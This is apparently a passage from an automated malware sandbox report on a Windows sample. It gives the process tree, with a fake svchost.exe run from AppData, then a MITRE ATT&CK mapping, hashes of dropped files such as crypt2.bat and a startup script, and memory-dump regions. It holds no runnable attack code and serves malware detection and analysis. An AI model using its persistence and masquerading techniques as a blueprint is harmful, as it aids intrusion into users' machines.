  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4588,i,421214848583369826,11944333761024955632,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4584 /prefetch:8
  2⤵
  PID:4776

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:60

C:\Users\Admin\AppData\Local\svchost.exe
C:\Users\Admin\AppData\Local\svchost.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3756

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1952

C:\Users\Admin\AppData\Local\svchost.exe
C:\Users\Admin\AppData\Local\svchost.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
3763b7c86f521528b988c3e68abfb0f4

SHA1
2418fb13aed0af2736691ff147eeb9f516c52587

SHA256
0db5d3ad9ff8e42b5e6ba09d9d2d0b0219ca93197abc00c68b974371b9cc5de2

SHA512
fef1da5fd2acdfd2e951354711be52db7e44699bbbf4f86332fbb899b4a6e55f2cd6bb306093f55332d39d1be80a830cd5c13f40f28012c4d4ed76faf560afb9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
a5a198c113174fd7d5df28951ef6a864

SHA1
60add37c931753f2e13322751c045066eaaa2812

SHA256
ecf63d1793137379a7be3ca2852c281c86705b25f6b165f0a3f7b2085dfdb153

SHA512
cc7afdc67c72ea7a57798b046e64a9f79e557db9a11a78fd3c7f8ef64f1b8e34d711abf6781eda7e8e988fc2e452a215d64366996513002f2586fdd4dc199f96

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
470a10b2ad4b8cd2391352063f38a8df

SHA1
80777736f2b4e9f08105c573ebaec1f495ff680d

SHA256
c647a5ca904c2dcb78525e290e84bd605dba33c3d97317959d81fef3f42d74bb

SHA512
98be33ef6fceee15df13fb1de84d0275dfc65c61189f28a6c8b114ca9b5ed205bb1ed59fce33e75b924ac7f73779bbd6df13bf24c3d80713e18d6fabe912a046

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0e35313688a841a4eaa9369a0b36e7f1

SHA1
384dea063a4c8f7a36086248db801737960f0357

SHA256
437c6e9ce082611c681e664add960ad95fa76afcc32981a9c480ff0259206a7e

SHA512
7ed378ee7910e765c4cf04a84aa609704e6b65441728c6ead7920a72ac66aff4a516523fa920103a6a4a75ab0ec416940113b2fc57c9f732a735654931811d28

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
712627c0031fd948bc53e144b938fad1

SHA1
94f9f6405efe82068ec0a7cef3065d5be6a71f22

SHA256
d9b2ed7a7454e12d50e36e8bc1765c31dd97976832407b1953f6b93e4c3d29b4

SHA512
8e7d3c12e5c9c34e49a362da68c7c94cf746eedc2a09b5597ce224c4d96b4dd836436a3063e3176ff7be812a827f4f24f9886d5af2594f5c73a8d7a815a7767a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bf6ea1a274086b5fe03a69956acd08d5

SHA1
05b0ba4e67ab19d6fdfe36932c43f33c0231763f

SHA256
361123376644da76ff774a7e5567444d7024b050faf5e058215aa137b327c0c7

SHA512
d302967d09996c93a2421d6fdd3b48f0b2f8223ca97dbadc8137b05f4d1c9f02905117356950a5cdaf9929f7fcbe411ee7b8594632f583b445b772c81d375416

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
fede928077fe67cf4baf063519f1c973

SHA1
0b2998fb26489b609394aef117af968ffdc4c211

SHA256
654d6004f91d686d22a0d9e51b1fc51784ad182821eab184c3941167b960c298

SHA512
a2f8f18392352236b8b1b0b4c7c337da38e7a0c4a97c55209c794e3086ce9559bb763fddc79be2265d2a9872df0b867c65827b9e1776d2a9de9cd868083db81d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
4e07e828bfb464c82fa6ff6be8e22876

SHA1
3ee6a929905e0952a116218857965c603e42b3fc

SHA256
1347b4ac7a3d377751341aaa27ee772236d9bb51b7699bdd216ecaa17cdef2b5

SHA512
ac35849360e45c6d4e011593d96a24d85046b29fec8726766584a69c22bcab9a6282e5d2c3724f3f38a1c1ea56d51e317bccabd7e977d4e8dccc1f91dddbe183

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1f427fff9164760ec183bb7a3833848a

SHA1
94afe1d175f30734eb3fb2b202528519876ac053

SHA256
5c40209c76f960327e555fd098180ae3cd2849e669bf275e1ab44e2500a87f6d

SHA512
2b2b2455f47bcbf8fef1a7fb2b622d94c15538056541f9f204e6cf369eeadd2deeed240378126c207699a60e987b7009a8599d14a3df0feb6b41f592d3a08593

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
232d20fe133bf237d5de1832a69a7a2d

SHA1
aa87c7cfc2bba069df50d00412cf130e18a6f40b

SHA256
99a5f21e8425a1cab9a75a36ebe724b020901333597714a749f36fd3a3242175

SHA512
3598998e4dd1215c288d0efa6685b1ddd76de59bd372b98d1279bed51add40fe7423d235a0cc5a8d0ff0d4abddd960d357b27c34ef01176ca77cc385409a7f2e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
207KB

MD5
30db0a8daf5fff395c69020f25c658f0

SHA1
f02bb163ce1d29da849a91fc6a06e3622287375e

SHA256
197582a80fc1d1c31ff476ff1e64bc705e3b8061d4e2eb6390fe866b7c66d730

SHA512
6eadf89c638b875b70c08f152f8b51e5e0fe71d42184c6d20e3285a339d7b88eea414541ceea11c4121170205a694fefaa9c16081d3314ad7ccd18fa2308a94b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
207KB

MD5
926831964881870b4f36b8d0e03ca980

SHA1
cda8987b136d95ac1412c2593bd4ea452a1e9937

SHA256
99b040fcefb7189150c66732e7a6223c760b84d3968d1a002c7795f6f2bd46d1

SHA512
2406c0aa56e3b8ebd9fa1bea5c87bac01ba76eb28c41eb792a03c6e683e27ba9925db7ab80741818392624543118d57e99727e526293a5b9e7b357aa0ed1d3a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

Filesize
1KB

MD5
28854213fdaa59751b2b4cfe772289cc

SHA1
fa7058052780f4b856dc2d56b88163ed55deb6ab

SHA256
7c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915

SHA512
1e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
13KB

MD5
a47ed2b2d3caedd8ba61acf1b174b4b6

SHA1
5e6debe86e76fcb5e151a40609c1f69867605c98

SHA256
13b99b9fe3d36446953ac10abe3ea115f4dfde68546fa09c6b18029f1014b129

SHA512
7a7352e841cc987f2b9699614d5f8860c6f449a2436352cab8aaefdb3f2d7e1c2dfba26fb752dfe722552eb1579968b57e8dc5f60b14894722e91b1e499a9ec1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
adad160c39ef078b7285a2456a290976

SHA1
d13a9894f8a9de676bbe6f59f20720f2bd2045fd

SHA256
ae97efbbe640d0f6408a84081546a4e0954a2be7b55874c8ecca51802d420c6d

SHA512
4437dc0aefe80fbb8773dc51f2257bef5fd7b1e27e62bf12428cf1e6bca9b2c7902cc85b4cbd60272de5fea567650fd6228cd831ecf63a3ce6d77c4847bfbb21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
56717aaa36fa21a8a72c753bd01e74a8

SHA1
c67237647e2e0f6e17f32a2c59d1f423056240c7

SHA256
5ef58a1d7d767b93d64be323f507ae1e8a52b737d1c6e5ea9dd3862eacd3b310

SHA512
44fc07f53dacd952ec78088b7c865cbe793f3b689afc1db57fd32c8eee36f0955adfdc87fe869dc210603b18df549a578c511adcb1e550e4bf915eee5195bd78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
65fdea14dfb4e1c95c0a4463eb4e6679

SHA1
091998e80924f6a6c24610df9ec4f797185ae8d7

SHA256
44f80f4bf118abe655ad627a814120af63482cf0c916c1dfd7eda0c98ef5f00d

SHA512
9176babe7681445f3cc4d996dc4321db110e32018caaec82d368c54277c2116632184504a7020cf6cdd4f454e622fc5fa4df0fccdf542a190458039747cb8915

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
01ec7566fa4aba35dfdbb8a5dc8e7190

SHA1
a31d6e5f1d31f94b5cee73301ea179f8d4115591

SHA256
ab23a90888c98f2dced38401330c258fcba58b5331ae65c204fe625e8f90db4e

SHA512
52194c80442777bac23dd647bca97152fed66bceebcad0dfafab5ff186256aaca4d8e8ce766e23242ab8035f1c9f0ab9965199a58d502d5a5a9536dfb6e924e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_diun4une.neo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\crypt2.bat

Filesize
270KB

MD5
3ea84c5d84c23aa2336ad19120ca2f69

SHA1
89f8c3ce7dff799df989d77b0589faeacf29577a

SHA256
c96331a38563d38ce6ae9f99294c0b39a595275cfdaf1ea85f91f693a7c302e6

SHA512
6aa2bf0d81b3fc103333e242492724dbfb45acb7ca5fd3289360bb7cff09d0bd524537570bc353f7ca92fb2e064aacdd3ee7e0a2fa4259b12056301050b8000f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tool\Armdot Deobf.exe

Filesize
22KB

MD5
e949a85cefc515f6d281a64a322e575a

SHA1
05cbb24ee6b77d47ed6b839d446d60c8bc9ffe83

SHA256
66ae316114440dc776171193df2af2ce768a3da53b84759ad72209d3ecd73274

SHA512
a4a047bbbe8383601db9bfe0b6390559032ba475ce8bb6790720c18b1577c4bd7831f68d69fac6f14721d651d84316d740ef0dc58a2ba34f31870ba9957193f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tool\cmd.exe

Filesize
316KB

MD5
428cec6b0034e0f183eb5bae887be480

SHA1
7140caf2a73676d1f7cd5e8529db861f4704c939

SHA256
3f6aa206177bebb29fc534c587a246e0f395941640f3f266c80743af95a02150

SHA512
509b8c138c4928524b4830488a96bd7e4bc7db2c494b10c68e1edcf7d901879126168eaa6635818d29734540f8400e376e5716a3b4dc052cba4e267bbaad7253

Download Submit
C:\Users\Admin\AppData\Local\svchost.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_618.vbs

Filesize
115B

MD5
2c83810e53a2e0aa0db1e75de3348773

SHA1
e0c9025cf980618a4c0baf79914de7a9ff039b14

SHA256
282c2ad807c0cffad33fa3565130d7778e5c7f7c65573db080af3892e2e32efe

SHA512
9c83b63cdcaed8f45b547937735ed2b3aa7f918f4e30b94fa5a0523b0bae3b34989003e00c4c598b8e3087f5212724c4312baeb678a256c546fd2c305f3e4520

Download Submit
memory/712-186-0x00000000709A0000-0x00000000709EC000-memory.dmp

Filesize
304KB

Download
memory/1504-104-0x0000000000AA0000-0x0000000000AAC000-memory.dmp

Filesize
48KB

Download
memory/1504-107-0x0000000005ED0000-0x00000000060E4000-memory.dmp

Filesize
2.1MB

Download
memory/1504-106-0x0000000005370000-0x000000000537A000-memory.dmp

Filesize
40KB

Download
memory/1504-105-0x0000000005410000-0x00000000054A2000-memory.dmp

Filesize
584KB

Download
memory/1796-144-0x00000000709A0000-0x00000000709EC000-memory.dmp

Filesize
304KB

Download
memory/3736-127-0x0000000007260000-0x0000000007303000-memory.dmp

Filesize
652KB

Download
memory/3736-117-0x00000000709A0000-0x00000000709EC000-memory.dmp

Filesize
304KB

Download
memory/3736-132-0x0000000007610000-0x0000000007618000-memory.dmp

Filesize
32KB

Download
memory/3736-131-0x0000000007620000-0x000000000763A000-memory.dmp

Filesize
104KB

Download
memory/3736-130-0x00000000075E0000-0x00000000075F4000-memory.dmp

Filesize
80KB

Download
memory/3736-129-0x00000000075D0000-0x00000000075DE000-memory.dmp

Filesize
56KB

Download
memory/3736-128-0x00000000075A0000-0x00000000075B1000-memory.dmp

Filesize
68KB

Download
memory/4024-41-0x00000000709A0000-0x00000000709EC000-memory.dmp

Filesize
304KB

Download
memory/4024-55-0x00000000078E0000-0x00000000078F1000-memory.dmp

Filesize
68KB

Download
memory/4024-30-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

Filesize
2.0MB

Download
memory/4024-51-0x0000000007530000-0x000000000754E000-memory.dmp

Filesize
120KB

Download
memory/4024-53-0x0000000007750000-0x000000000775A000-memory.dmp

Filesize
40KB

Download
memory/4024-52-0x00000000075B0000-0x0000000007653000-memory.dmp

Filesize
652KB

Download
memory/4024-58-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

Filesize
2.0MB

Download
memory/4024-40-0x0000000007570000-0x00000000075A2000-memory.dmp

Filesize
200KB

Download
memory/4024-54-0x0000000007970000-0x0000000007A06000-memory.dmp

Filesize
600KB

Download
memory/4024-29-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

Filesize
2.0MB

Download
memory/4764-83-0x0000000007100000-0x0000000007110000-memory.dmp

Filesize
64KB

Download
memory/4764-84-0x00000000071B0000-0x000000000724C000-memory.dmp

Filesize
624KB

Download
memory/4940-165-0x00000000709A0000-0x00000000709EC000-memory.dmp

Filesize
304KB

Download
memory/5064-5-0x0000000005370000-0x00000000053A6000-memory.dmp

Filesize
216KB

Download
memory/5064-25-0x00000000079E0000-0x00000000079E8000-memory.dmp

Filesize
32KB

Download
memory/5064-27-0x0000000008C20000-0x00000000091C4000-memory.dmp

Filesize
5.6MB

Download
memory/5064-26-0x0000000007A40000-0x0000000007AA2000-memory.dmp

Filesize
392KB

Download
memory/5064-67-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

Filesize
2.0MB

Download
memory/5064-24-0x00000000079A0000-0x00000000079BA000-memory.dmp

Filesize
104KB

Download
memory/5064-23-0x0000000007FF0000-0x000000000866A000-memory.dmp

Filesize
6.5MB

Download
memory/5064-22-0x00000000068D0000-0x000000000691C000-memory.dmp

Filesize
304KB

Download
memory/5064-21-0x0000000006830000-0x000000000684E000-memory.dmp

Filesize
120KB

Download
memory/5064-20-0x0000000006360000-0x00000000066B4000-memory.dmp

Filesize
3.3MB

Download
memory/5064-10-0x00000000062F0000-0x0000000006356000-memory.dmp

Filesize
408KB

Download
memory/5064-9-0x0000000006280000-0x00000000062E6000-memory.dmp

Filesize
408KB

Download
memory/5064-8-0x0000000005980000-0x00000000059A2000-memory.dmp

Filesize
136KB

Download
memory/5064-7-0x0000000005AE0000-0x0000000006108000-memory.dmp

Filesize
6.2MB

Download
memory/5064-6-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

Filesize
2.0MB

Download
memory/5064-78-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

Filesize
2.0MB

Download
memory/5064-4-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

Filesize
2.0MB

Download